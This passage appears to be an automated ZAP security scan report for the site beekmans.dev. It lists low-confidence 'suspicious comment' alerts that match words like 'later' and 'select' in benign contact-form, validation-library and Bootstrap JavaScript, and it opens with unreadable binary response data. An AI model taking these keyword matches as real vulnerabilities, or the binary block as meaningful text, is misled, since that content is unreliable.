          8‘÷çÆIg4Šíuµ;iïæó ¶Å-†AµL³”CÝ#IP­El2t°¿:gòÑ:s€ø",ZT’Þ˜yʊb§œÎÝv@©«©"b³º)dq]ä&8í»€)ß0´ÃÌÅü6`Šè<vXxÔE
          D¤RT¸ÏnxX–*Iio4|-eïpMÇA²€›%Ž.y,!7,	W.¶Ýu¸DKý¶z+Â"¨wòFk[âxŸìa¨ßž$Ћt#&hV2«ÔÐ*º²hWóI#iw¢]S&@E'ʰ·¥dÝ @O	”ør`¡¥Â£JÈoo§³~ œ¯XxR€äíùE.¤ËY%ê ùÃÝ«Gp.µE`%kôˆ÷–^äŠdÛ¸|^*¦È#ºëR…¯Wò0(aôýݬFòB~?ë_´74öͱÖL·&;K:¨ɪ‹.œÉåñ,4ȝfôœ5Pôî‚ßb‚&(þÚ¬LêGL¾ÖÈS—ÞÌ|>Ñkì†ë)x8áØ®sóaH÷O^ðîn¤œÕ}+¶ß@دõ_ñe)wÞ;'Á­uëÿŸô×{ÜjøBIÈI'J>#-\{_‹n©6áœÛU
          ìMwVÈڃÀAݯy™'@+ƒ˜¾e®ƒý®)¿åÂÕñ¯f[H#€©æ¬!W¼SpgŒ%žäªÐò¸~š”`À¨=ÚPp¦À¼ú?1üãB
          rÀƒ„ ”Õ:r5J99ÜæÄêêÈW܅‡]Í´ZAþWÞÑÿ©c«…±ð]ë<$}0ò.ê´9Ra‘øï–ó=ý•QƒDR
          nDQk
          ÇAÒøÜn£Áà
          ëžSkÚGgªµ8³(ÍìÈ¡ 80Rgu½9aÓuy¯‹މ—‡ö)²ÃøÆ»ì#»læÄ±Å&%ç'Ã¡>Ÿµ0i‹™É\N™LˆÈ»±Ý.B©™ã§P˜Oqk@W5W¦• æKÜ«Ê!Ïíª¹H$®I¼?HÎS0âûº×.Äé•Gñ‚Ö«ïŽÚ'¶N£"sP”á;¤Ø6„`9º{­å3&ë¹æ„æá(ñY<¾)?˜âö88rùÓÁÑ]˜,µ^Ë
          «=FXeÃDZ£á,Ñ|`Zq-¾ÖKÚG”nR›Ó(–tCÝ “ÉÏ|·©Ôk5F[<œÛömm$Læ†^¦3.n” ]|Í7’îtQ1õ­¥T'ü]–˜ôg碀ëG'C™'îWى'$s¾Þó"רÆþJC7·ä3©›¹”ÖeFÜyG0ېiàêË–Êæ€6¾é1F9'£»Ý*Ý:0üù:¼r‡'´–i<¥Í‰å¹Âc	É·HJq»áУ|Z°ðȗ;{°_Íå㊩í¼ßݕKÖÆ:zuêJs_xîíTÂpý‰‹02yj‘"Òö;•8ùD†·Yp´Åó8Ío·öñžI¸ùFW™€í•kÍJæF ExÜ'1z²a.IÆ`­ŒKÒ¦ ÇU,ºˆG©€µû+Jn»ô´(
          Solution

          Ensure each page is setting the specific and appropriate content-type value for the content being delivered.

  5. Risk=Informational, Confidence=Low (4)

    1. https://beekmans.dev (4)

      1. Information Disclosure - Suspicious Comments (4)
        1. GET https://beekmans.dev/js/contact_me.js
          Alert tags
          Alert description

          The response appears to contain suspicious comments which may help an attacker. Note: Matches made within script blocks or files are against the entire content not only comments.

          Other info

          The following pattern was used: \bLATER\b and was detected in the element starting with: "$this=$("#sendMessageButton");$this.prop("disabled",true);$.ajax({url:"././mail/contact_me.php",type:"POST",data:{name:name,phon", see evidence field for the suspicious comment/snippet.

          Request
          Request line and header section (240 bytes)
          GET https://beekmans.dev/js/contact_me.js HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1265 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:05 GMT
          Content-Type: application/javascript; charset=utf-8
          Content-Length: 1740
          Connection: keep-alive
          Cf-Bgj: minify
          Cf-Polished: origSize=2882
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          etag: "b42-59f7b95575b07-gzip"
          last-modified: Wed, 26 Feb 2020 14:40:18 GMT
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          vary: Accept-Encoding
          x-content-type-options: nosniff
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 5293
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OGVw677%2FdAw0I9gMTzygLi3bURR%2BBMOl3i3SclQ6We8D6Mi%2F3MWEMhC%2B2bWsowbzuJ38TfwZuDkWO%2Blr660Zfyibc9a4K85r%2FDBsBH4MjxUV8uzWISZB%2BuVGTZLomQk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a46fbc5d0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (1740 bytes)
          $(function(){$("#contactForm input,#contactForm textarea").jqBootstrapValidation({preventSubmit:true,submitError:function($form,event,errors){},submitSuccess:function($form,event){event.preventDefault();var name=$("input#name").val();var email=$("input#email").val();var phone=$("input#phone").val();var message=$("textarea#message").val();var firstName=name;if(firstName.indexOf(' ')>=0){firstName=name.split(' ').slice(0,-1).join(' ');}
          $this=$("#sendMessageButton");$this.prop("disabled",true);$.ajax({url:"././mail/contact_me.php",type:"POST",data:{name:name,phone:phone,email:email,message:message},cache:false,success:function(){$('#success').html("<div class='alert alert-success'>");$('#success > .alert-success').html("<button type='button' class='close' data-dismiss='alert' aria-hidden='true'>&times;").append("</button>");$('#success > .alert-success').append("<strong>Your message has been sent. </strong>");$('#success > .alert-success').append('</div>');$('#contactForm').trigger("reset");},error:function(){$('#success').html("<div class='alert alert-danger'>");$('#success > .alert-danger').html("<button type='button' class='close' data-dismiss='alert' aria-hidden='true'>&times;").append("</button>");$('#success > .alert-danger').append($("<strong>").text("Sorry "+firstName+", it seems that my mail server is not responding. Please try again later!"));$('#success > .alert-danger').append('</div>');$('#contactForm').trigger("reset");},complete:function(){setTimeout(function(){$this.prop("disabled",false);},1000);}});},filter:function(){return $(this).is(":visible");},});$("a[data-toggle=\"tab\"]").click(function(e){e.preventDefault();$(this).tab("show");});});$('#name').focus(function(){$('#success').html('');});
          Evidence
          later
          Solution

          Remove all comments that return information that may help an attacker and fix any underlying problems they refer to.

        2. GET https://beekmans.dev/js/jqBootstrapValidation.js
          Alert tags
          Alert description

          The response appears to contain suspicious comments which may help an attacker. Note: Matches made within script blocks or files are against the entire content not only comments.

          Other info

          The following pattern was used: \bSELECT\b and was detected 2 times, the first in the element starting with: "(function($){var createdElements=[];var defaults={options:{prependExistingHelpBlock:false,sniffHtml:true,preventSubmit:true,subm", see evidence field for the suspicious comment/snippet.

          Request
          Request line and header section (251 bytes)
          GET https://beekmans.dev/js/jqBootstrapValidation.js HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1260 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:05 GMT
          Content-Type: application/javascript; charset=utf-8
          Content-Length: 20156
          Connection: keep-alive
          Cf-Bgj: minify
          Cf-Polished: origSize=38110
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          etag: "94de-59f7b9557b8c7-gzip"
          last-modified: Wed, 26 Feb 2020 14:40:18 GMT
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          vary: Accept-Encoding
          x-content-type-options: nosniff
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 5293
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wGjGidnFQRDlnz9HDh53bKpEcUeGSwpXl7KKT8QEt7r7AUeLzNcDb%2FkLONGS89ir6ItgTctL1%2F%2FJc6KdDqhGW5ucWLaL3nPdhzzhvavoksNd1yk16npZmuBjUIaxXqY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a46f8c090c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (20156 bytes)
          (function($){var createdElements=[];var defaults={options:{prependExistingHelpBlock:false,sniffHtml:true,preventSubmit:true,submitError:false,submitSuccess:false,semanticallyStrict:false,autoAdd:{helpBlocks:true},filter:function(){return true;}},methods:{init:function(options){var settings=$.extend(true,{},defaults);settings.options=$.extend(true,settings.options,options);var $siblingElements=this;var uniqueForms=$.unique($siblingElements.map(function(){return $(this).parents("form")[0];}).toArray());$(uniqueForms).bind("submit",function(e){var $form=$(this);var warningsFound=0;var $inputs=$form.find("input,textarea,select").not("[type=submit],[type=image]").filter(settings.options.filter);$inputs.trigger("submit.validation").trigger("validationLostFocus.validation");$inputs.each(function(i,el){var $this=$(el),$controlGroup=$this.parents(".form-group").first();if($controlGroup.hasClass("warning")){$controlGroup.removeClass("warning").addClass("error");warningsFound++;}});$inputs.trigger("validationLostFocus.validation");if(warningsFound){if(settings.options.preventSubmit){e.preventDefault();}
          $form.addClass("error");if($.isFunction(settings.options.submitError)){settings.options.submitError($form,e,$inputs.jqBootstrapValidation("collectErrors",true));}}else{$form.removeClass("error");if($.isFunction(settings.options.submitSuccess)){settings.options.submitSuccess($form,e);}}});return this.each(function(){var $this=$(this),$controlGroup=$this.parents(".form-group").first(),$helpBlock=$controlGroup.find(".help-block").first(),$form=$this.parents("form").first(),validatorNames=[];if(!$helpBlock.length&&settings.options.autoAdd&&settings.options.autoAdd.helpBlocks){$helpBlock=$('<div class="help-block" />');$controlGroup.find('.controls').append($helpBlock);createdElements.push($helpBlock[0]);}
          if(settings.options.sniffHtml){var message="";if($this.attr("pattern")!==undefined){message="Not in the expected format<!-- data-validation-pattern-message to override -->";if($this.data("validationPatternMessage")){message=$this.data("validationPatternMessage");}
          $this.data("validationPatternMessage",message);$this.data("validationPatternRegex",$this.attr("pattern"));}
          if($this.attr("max")!==undefined||$this.attr("aria-valuemax")!==undefined){var max=($this.attr("max")!==undefined?$this.attr("max"):$this.attr("aria-valuemax"));message="Too high: Maximum of '"+max+"'<!-- data-validation-max-message to override -->";if($this.data("validationMaxMessage")){message=$this.data("validationMaxMessage");}
          $this.data("validationMaxMessage",message);$this.data("validationMaxMax",max);}
          if($this.attr("min")!==undefined||$this.attr("aria-valuemin")!==undefined){var min=($this.attr("min")!==undefined?$this.attr("min"):$this.attr("aria-valuemin"));message="Too low: Minimum of '"+min+"'<!-- data-validation-min-message to override -->";if($this.data("validationMinMessage")){message=$this.data("validationMinMessage");}
          $this.data("validationMinMessage",message);$this.data("validationMinMin",min);}
          if($this.attr("maxlength")!==undefined){message="Too long: Maximum of '"+$this.attr("maxlength")+"' characters<!-- data-validation-maxlength-message to override -->";if($this.data("validationMaxlengthMessage")){message=$this.data("validationMaxlengthMessage");}
          $this.data("validationMaxlengthMessage",message);$this.data("validationMaxlengthMaxlength",$this.attr("maxlength"));}
          if($this.attr("minlength")!==undefined){message="Too short: Minimum of '"+$this.attr("minlength")+"' characters<!-- data-validation-minlength-message to override -->";if($this.data("validationMinlengthMessage")){message=$this.data("validationMinlengthMessage");}
          $this.data("validationMinlengthMessage",message);$this.data("validationMinlengthMinlength",$this.attr("minlength"));}
          if($this.attr("required")!==undefined||$this.attr("aria-required")!==undefined){message=settings.builtInValidators.required.message;if($this.data("validationRequiredMessage")){message=$this.data("validationRequiredMessage");}
          $this.data("validationRequiredMessage",message);}
          if($this.attr("type")!==undefined&&$this.attr("type").toLowerCase()==="number"){message=settings.builtInValidators.number.message;if($this.data("validationNumberMessage")){message=$this.data("validationNumberMessage");}
          $this.data("validationNumberMessage",message);}
          if($this.attr("type")!==undefined&&$this.attr("type").toLowerCase()==="email"){message="Not a valid email address<!-- data-validator-validemail-message to override -->";if($this.data("validationValidemailMessage")){message=$this.data("validationValidemailMessage");}else if($this.data("validationEmailMessage")){message=$this.data("validationEmailMessage");}
          $this.data("validationValidemailMessage",message);}
          if($this.attr("minchecked")!==undefined){message="Not enough options checked; Minimum of '"+$this.attr("minchecked")+"' required<!-- data-validation-minchecked-message to override -->";if($this.data("validationMincheckedMessage")){message=$this.data("validationMincheckedMessage");}
          $this.data("validationMincheckedMessage",message);$this.data("validationMincheckedMinchecked",$this.attr("minchecked"));}
          if($this.attr("maxchecked")!==undefined){message="Too many options checked; Maximum of '"+$this.attr("maxchecked")+"' required<!-- data-validation-maxchecked-message to override -->";if($this.data("validationMaxcheckedMessage")){message=$this.data("validationMaxcheckedMessage");}
          $this.data("validationMaxcheckedMessage",message);$this.data("validationMaxcheckedMaxchecked",$this.attr("maxchecked"));}}
          if($this.data("validation")!==undefined){validatorNames=$this.data("validation").split(",");}
          $.each($this.data(),function(i,el){var parts=i.replace(/([A-Z])/g,",$1").split(",");if(parts[0]==="validation"&&parts[1]){validatorNames.push(parts[1]);}});var validatorNamesToInspect=validatorNames;var newValidatorNamesToInspect=[];do
          {$.each(validatorNames,function(i,el){validatorNames[i]=formatValidatorName(el);});validatorNames=$.unique(validatorNames);newValidatorNamesToInspect=[];$.each(validatorNamesToInspect,function(i,el){if($this.data("validation"+el+"Shortcut")!==undefined){$.each($this.data("validation"+el+"Shortcut").split(","),function(i2,el2){newValidatorNamesToInspect.push(el2);});}else if(settings.builtInValidators[el.toLowerCase()]){var validator=settings.builtInValidators[el.toLowerCase()];if(validator.type.toLowerCase()==="shortcut"){$.each(validator.shortcut.split(","),function(i,el){el=formatValidatorName(el);newValidatorNamesToInspect.push(el);validatorNames.push(el);});}}});validatorNamesToInspect=newValidatorNamesToInspect;}while(validatorNamesToInspect.length>0)
          var validators={};$.each(validatorNames,function(i,el){var message=$this.data("validation"+el+"Message");var hasOverrideMessage=(message!==undefined);var foundValidator=false;message=(message?message:"'"+el+"' validation failed <!-- Add attribute 'data-validation-"+el.toLowerCase()+"-message' to input to change this message -->");$.each(settings.validatorTypes,function(validatorType,validatorTemplate){if(validators[validatorType]===undefined){validators[validatorType]=[];}
          if(!foundValidator&&$this.data("validation"+el+formatValidatorName(validatorTemplate.name))!==undefined){validators[validatorType].push($.extend(true,{name:formatValidatorName(validatorTemplate.name),message:message},validatorTemplate.init($this,el)));foundValidator=true;}});if(!foundValidator&&settings.builtInValidators[el.toLowerCase()]){var validator=$.extend(true,{},settings.builtInValidators[el.toLowerCase()]);if(hasOverrideMessage){validator.message=message;}
          var validatorType=validator.type.toLowerCase();if(validatorType==="shortcut"){foundValidator=true;}else{$.each(settings.validatorTypes,function(validatorTemplateType,validatorTemplate){if(validators[validatorTemplateType]===undefined){validators[validatorTemplateType]=[];}
          if(!foundValidator&&validatorType===validatorTemplateType.toLowerCase()){$this.data("validation"+el+formatValidatorName(validatorTemplate.name),validator[validatorTemplate.name.toLowerCase()]);validators[validatorType].push($.extend(validator,validatorTemplate.init($this,el)));foundValidator=true;}});}}
          if(!foundValidator){$.error("Cannot find validation info for '"+el+"'");}});$helpBlock.data("original-contents",($helpBlock.data("original-contents")?$helpBlock.data("original-contents"):$helpBlock.html()));$helpBlock.data("original-role",($helpBlock.data("original-role")?$helpBlock.data("original-role"):$helpBlock.attr("role")));$controlGroup.data("original-classes",($controlGroup.data("original-clases")?$controlGroup.data("original-classes"):$controlGroup.attr("class")));$this.data("original-aria-invalid",($this.data("original-aria-invalid")?$this.data("original-aria-invalid"):$this.attr("aria-invalid")));$this.bind("validation.validation",function(event,params){var value=getValue($this);var errorsFound=[];$.each(validators,function(validatorType,validatorTypeArray){if(value||value.length||(params&&params.includeEmpty)||(!!settings.validatorTypes[validatorType].blockSubmit&&params&&!!params.submitting)){$.each(validatorTypeArray,function(i,validator){if(settings.validatorTypes[validatorType].validate($this,value,validator)){errorsFound.push(validator.message);}});}});return errorsFound;});$this.bind("getValidators.validation",function(){return validators;});$this.bind("submit.validation",function(){return $this.triggerHandler("change.validation",{submitting:true});});$this.bind(["keyup","focus","blur","click","keydown","keypress","change"].join(".validation ")+".validation",function(e,params){var value=getValue($this);var errorsFound=[];$controlGroup.find("input,textarea,select").each(function(i,el){var oldCount=errorsFound.length;$.each($(el).triggerHandler("validation.validation",params),function(j,message){errorsFound.push(message);});if(errorsFound.length>oldCount){$(el).attr("aria-invalid","true");}else{var original=$this.data("original-aria-invalid");$(el).attr("aria-invalid",(original!==undefined?original:false));}});$form.find("input,select,textarea").not($this).not("[name=\""+$this.attr("name")+"\"]").trigger("validationLostFocus.validation");errorsFound=$.unique(errorsFound.sort());if(errorsFound.length){$controlGroup.removeClass("success error").addClass("warning");if(settings.options.semanticallyStrict&&errorsFound.length===1){$helpBlock.html(errorsFound[0]+
          (settings.options.prependExistingHelpBlock?$helpBlock.data("original-contents"):""));}else{$helpBlock.html("<ul role=\"alert\"><li>"+errorsFound.join("</li><li>")+"</li></ul>"+
          (settings.options.prependExistingHelpBlock?$helpBlock.data("original-contents"):""));}}else{$controlGroup.removeClass("warning error success");if(value.length>0){$controlGroup.addClass("success");}
          $helpBlock.html($helpBlock.data("original-contents"));}
          if(e.type==="blur"){$controlGroup.removeClass("success");}});$this.bind("validationLostFocus.validation",function(){$controlGroup.removeClass("success");});});},destroy:function(){return this.each(function(){var
          $this=$(this),$controlGroup=$this.parents(".form-group").first(),$helpBlock=$controlGroup.find(".help-block").first();$this.unbind('.validation');$helpBlock.html($helpBlock.data("original-contents"));$controlGroup.attr("class",$controlGroup.data("original-classes"));$this.attr("aria-invalid",$this.data("original-aria-invalid"));$helpBlock.attr("role",$this.data("original-role"));if(createdElements.indexOf($helpBlock[0])>-1){$helpBlock.remove();}});},collectErrors:function(includeEmpty){var errorMessages={};this.each(function(i,el){var $el=$(el);var name=$el.attr("name");var errors=$el.triggerHandler("validation.validation",{includeEmpty:true});errorMessages[name]=$.extend(true,errors,errorMessages[name]);});$.each(errorMessages,function(i,el){if(el.length===0){delete errorMessages[i];}});return errorMessages;},hasErrors:function(){var errorMessages=[];this.each(function(i,el){errorMessages=errorMessages.concat($(el).triggerHandler("getValidators.validation")?$(el).triggerHandler("validation.validation",{submitting:true}):[]);});return(errorMessages.length>0);},override:function(newDefaults){defaults=$.extend(true,defaults,newDefaults);}},validatorTypes:{callback:{name:"callback",init:function($this,name){return{validatorName:name,callback:$this.data("validation"+name+"Callback"),lastValue:$this.val(),lastValid:true,lastFinished:true};},validate:function($this,value,validator){if(validator.lastValue===value&&validator.lastFinished){return!validator.lastValid;}
          if(validator.lastFinished===true){validator.lastValue=value;validator.lastValid=true;validator.lastFinished=false;var rrjqbvValidator=validator;var rrjqbvThis=$this;executeFunctionByName(validator.callback,window,$this,value,function(data){if(rrjqbvValidator.lastValue===data.value){rrjqbvValidator.lastValid=data.valid;if(data.message){rrjqbvValidator.message=data.message;}
          rrjqbvValidator.lastFinished=true;rrjqbvThis.data("validation"+rrjqbvValidator.validatorName+"Message",rrjqbvValidator.message);setTimeout(function(){rrjqbvThis.trigger("change.validation");},1);}});}
          return false;}},ajax:{name:"ajax",init:function($this,name){return{validatorName:name,url:$this.data("validation"+name+"Ajax"),lastValue:$this.val(),lastValid:true,lastFinished:true};},validate:function($this,value,validator){if(""+validator.lastValue===""+value&&validator.lastFinished===true){return validator.lastValid===false;}
          if(validator.lastFinished===true){validator.lastValue=value;validator.lastValid=true;validator.lastFinished=false;$.ajax({url:validator.url,data:"value="+value+"&field="+$this.attr("name"),dataType:"json",success:function(data){if(""+validator.lastValue===""+data.value){validator.lastValid=!!(data.valid);if(data.message){validator.message=data.message;}
          validator.lastFinished=true;$this.data("validation"+validator.validatorName+"Message",validator.message);setTimeout(function(){$this.trigger("change.validation");},1);}},failure:function(){validator.lastValid=true;validator.message="ajax call failed";validator.lastFinished=true;$this.data("validation"+validator.validatorName+"Message",validator.message);setTimeout(function(){$this.trigger("change.validation");},1);}});}
          return false;}},regex:{name:"regex",init:function($this,name){return{regex:regexFromString($this.data("validation"+name+"Regex"))};},validate:function($this,value,validator){return(!validator.regex.test(value)&&!validator.negative)||(validator.regex.test(value)&&validator.negative);}},required:{name:"required",init:function($this,name){return{};},validate:function($this,value,validator){return!!(value.length===0&&!validator.negative)||!!(value.length>0&&validator.negative);},blockSubmit:true},match:{name:"match",init:function($this,name){var element=$this.parents("form").first().find("[name=\""+$this.data("validation"+name+"Match")+"\"]").first();element.bind("validation.validation",function(){$this.trigger("change.validation",{submitting:true});});return{"element":element};},validate:function($this,value,validator){return(value!==validator.element.val()&&!validator.negative)||(value===validator.element.val()&&validator.negative);},blockSubmit:true},max:{name:"max",init:function($this,name){return{max:$this.data("validation"+name+"Max")};},validate:function($this,value,validator){return(parseFloat(value,10)>parseFloat(validator.max,10)&&!validator.negative)||(parseFloat(value,10)<=parseFloat(validator.max,10)&&validator.negative);}},min:{name:"min",init:function($this,name){return{min:$this.data("validation"+name+"Min")};},validate:function($this,value,validator){return(parseFloat(value)<parseFloat(validator.min)&&!validator.negative)||(parseFloat(value)>=parseFloat(validator.min)&&validator.negative);}},maxlength:{name:"maxlength",init:function($this,name){return{maxlength:$this.data("validation"+name+"Maxlength")};},validate:function($this,value,validator){return((value.length>validator.maxlength)&&!validator.negative)||((value.length<=validator.maxlength)&&validator.negative);}},minlength:{name:"minlength",init:function($this,name){return{minlength:$this.data("validation"+name+"Minlength")};},validate:function($this,value,validator){return((value.length<validator.minlength)&&!validator.negative)||((value.length>=validator.minlength)&&validator.negative);}},maxchecked:{name:"maxchecked",init:function($this,name){var elements=$this.parents("form").first().find("[name=\""+$this.attr("name")+"\"]");elements.bind("click.validation",function(){$this.trigger("change.validation",{includeEmpty:true});});return{maxchecked:$this.data("validation"+name+"Maxchecked"),elements:elements};},validate:function($this,value,validator){return(validator.elements.filter(":checked").length>validator.maxchecked&&!validator.negative)||(validator.elements.filter(":checked").length<=validator.maxchecked&&validator.negative);},blockSubmit:true},minchecked:{name:"minchecked",init:function($this,name){var elements=$this.parents("form").first().find("[name=\""+$this.attr("name")+"\"]");elements.bind("click.validation",function(){$this.trigger("change.validation",{includeEmpty:true});});return{minchecked:$this.data("validation"+name+"Minchecked"),elements:elements};},validate:function($this,value,validator){return(validator.elements.filter(":checked").length<validator.minchecked&&!validator.negative)||(validator.elements.filter(":checked").length>=validator.minchecked&&validator.negative);},blockSubmit:true}},builtInValidators:{email:{name:"Email",type:"shortcut",shortcut:"validemail"},validemail:{name:"Validemail",type:"regex",regex:"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\\.[A-Za-z]{2,4}",message:"Not a valid email address<!-- data-validator-validemail-message to override -->"},passwordagain:{name:"Passwordagain",type:"match",match:"password",message:"Does not match the given password<!-- data-validator-paswordagain-message to override -->"},positive:{name:"Positive",type:"shortcut",shortcut:"number,positivenumber"},negative:{name:"Negative",type:"shortcut",shortcut:"number,negativenumber"},number:{name:"Number",type:"regex",regex:"([+-]?\\\d+(\\\.\\\d*)?([eE][+-]?[0-9]+)?)?",message:"Must be a number<!-- data-validator-number-message to override -->"},integer:{name:"Integer",type:"regex",regex:"[+-]?\\\d+",message:"No decimal places allowed<!-- data-validator-integer-message to override -->"},positivenumber:{name:"Positivenumber",type:"min",min:0,message:"Must be a positive number<!-- data-validator-positivenumber-message to override -->"},negativenumber:{name:"Negativenumber",type:"max",max:0,message:"Must be a negative number<!-- data-validator-negativenumber-message to override -->"},required:{name:"Required",type:"required",message:"This is required<!-- data-validator-required-message to override -->"},checkone:{name:"Checkone",type:"minchecked",minchecked:1,message:"Check at least one option<!-- data-validation-checkone-message to override -->"}}};var formatValidatorName=function(name){return name.toLowerCase().replace(/(^|\s)([a-z])/g,function(m,p1,p2){return p1+p2.toUpperCase();});};var getValue=function($this){var value=$this.val();var type=$this.attr("type");if(type==="checkbox"){value=($this.is(":checked")?value:"");}
          if(type==="radio"){value=($('input[name="'+$this.attr("name")+'"]:checked').length>0?value:"");}
          return value;};function regexFromString(inputstring){return new RegExp("^"+inputstring+"$");}
          function executeFunctionByName(functionName,context){var args=Array.prototype.slice.call(arguments).splice(2);var namespaces=functionName.split(".");var func=namespaces.pop();for(var i=0;i<namespaces.length;i++){context=context[namespaces[i]];}
          return context[func].apply(this,args);}
          $.fn.jqBootstrapValidation=function(method){if(defaults.methods[method]){return defaults.methods[method].apply(this,Array.prototype.slice.call(arguments,1));}else if(typeof method==='object'||!method){return defaults.methods.init.apply(this,arguments);}else{$.error('Method '+method+' does not exist on jQuery.jqBootstrapValidation');return null;}};$.jqBootstrapValidation=function(options){$(":input").not("[type=image],[type=submit]").jqBootstrapValidation.apply(this,arguments);};})(jQuery);
          Evidence
          select
          Solution

          Remove all comments that return information that may help an attacker and fix any underlying problems they refer to.

        3. GET https://beekmans.dev/vendor/bootstrap/js/bootstrap.bundle.min.js
          Alert tags
          Alert description

          The response appears to contain suspicious comments which may help an attacker. Note: Matches made within script blocks or files are against the entire content not only comments.

          Other info

          The following pattern was used: \bFROM\b and was detected in the element starting with: "!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery")):"function"==typeof define&&defi", see evidence field for the suspicious comment/snippet.

          Request
          Request line and header section (268 bytes)
          GET https://beekmans.dev/vendor/bootstrap/js/bootstrap.bundle.min.js HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1167 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:05 GMT
          Content-Type: application/javascript; charset=utf-8
          Connection: keep-alive
          last-modified: Fri, 15 Mar 2019 09:41:20 GMT
          etag: W/"12a14-5841ed7589c5e-gzip"
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: MISS
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X6LhT7okCjllVCP1Debg47TkxjsLU%2BAqDS7v8sknBxY5o2m9Ygyx0s90hdU5OCh%2FXSjwS6UI6ZiNrZUQ%2F%2B8nGq9IcDtldgElywhYK4RTL6EzydKEG1Gtt%2B5HuO9pZEU%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a46ebad10c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (76308 bytes)
          /*!
            * Bootstrap v4.2.1 (https://getbootstrap.com/)
            * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
            * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
            */
          !function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery")):"function"==typeof define&&define.amd?define(["exports","jquery"],e):e(t.bootstrap={},t.jQuery)}(this,function(t,p){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(o){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{},e=Object.keys(r);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(r).filter(function(t){return Object.getOwnPropertyDescriptor(r,t).enumerable}))),e.forEach(function(t){var e,n,i;e=o,i=r[n=t],n in e?Object.defineProperty(e,n,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[n]=i})}return o}p=p&&p.hasOwnProperty("default")?p.default:p;var e="transitionend";function n(t){var e=this,n=!1;return p(this).one(m.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||m.triggerTransitionEnd(e)},t),this}var m={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;t+=~~(1e6*Math.random()),document.getElementById(t););return t},getSelectorFromElement:function(t){var e=t.getAttribute("data-target");if(!e||"#"===e){var n=t.getAttribute("href");e=n&&"#"!==n?n.trim():""}return e&&document.querySelector(e)?e:null},getTransitionDurationFromElement:function(t){if(!t)return 0;var e=p(t).css("transition-duration"),n=p(t).css("transition-delay"),i=parseFloat(e),o=parseFloat(n);return i||o?(e=e.split(",")[0],n=n.split(",")[0],1e3*(parseFloat(e)+parseFloat(n))):0},reflow:function(t){return 